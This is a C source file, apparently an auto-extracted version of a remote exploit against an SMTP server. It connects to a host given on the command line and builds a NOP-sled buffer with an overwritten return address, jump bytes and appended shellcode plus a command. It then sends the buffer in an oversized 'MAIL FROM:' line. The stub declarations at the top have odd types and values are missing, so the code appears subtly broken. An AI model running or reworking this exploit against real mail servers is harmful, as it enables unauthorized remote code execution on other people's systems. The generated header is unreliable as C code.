
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
struct hostent {char* h_addr; char h_length; int h_addrtype; } ;
typedef int packetbuf ;
typedef int cli ;
typedef char* caddr_t ;


 int AF_INET ;
 int BUFSIZE ;
 int EIP ;
 size_t JMPADR ;
 char JMPOFS ;
 char JMPS ;
 size_t RETADR ;
 int SMTP_PORT ;
 int SOCK_STREAM ;
 int bzero (struct sockaddr_in*,int) ;
 int close (int) ;
 char* cmdbuf ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 char* exploit_code ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int inet_addr (char*) ;
 int memcpy (char*,char*,char) ;
 int memset (char*,int,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int read (int,char*,int) ;
 int sleep (int) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,...) ;
 int strcat (char*,char*) ;
 int * strchr (char*,char) ;
 char strlen (char*) ;
 int write (int,char*,char) ;

int main(int argc,char *argv[])
{
        struct hostent *hs;
        struct sockaddr_in cli;
        char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
        int sockfd,i,ip;

        if (argc<2){
            printf("usage\n %s HostName\n",argv[0]);
            exit(1);
        }
        bzero(&cli, sizeof(cli));
        cli.sin_family = AF_INET;
        cli.sin_port = htons(SMTP_PORT);
        if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==((void*)0)){
                printf("Can not resolve specified host.\n");
                exit(1);
            }
            cli.sin_family = hs->h_addrtype;
            memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
        }

        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
            perror("socket"); exit(0);
        }

        if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
            perror("connect"); exit(0);
        }
        while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
            packetbuf[i]=0;
            if(strchr(packetbuf,'\n')!=((void*)0)) break;
        }

        strcat(exploit_code,cmdbuf);
        exploit_code[65]=strlen(cmdbuf+23);
        memset(buf,0x90,BUFSIZE);
        ip=EIP;
        buf[RETADR ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
        buf[JMPADR] =JMPS;
        buf[JMPADR+1]=JMPOFS;
        memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
        buf[2000]=0;

        sprintf(packetbuf,"helo penguin\r\n");
        write(sockfd,packetbuf,strlen(packetbuf));
        while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
            packetbuf[i]=0;
            if(strchr(packetbuf,'\n')!=((void*)0)) break;
        }
        printf("%s\n",packetbuf);
        sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
        write(sockfd,packetbuf,strlen(packetbuf));
        sleep(100);
        close(sockfd);
}
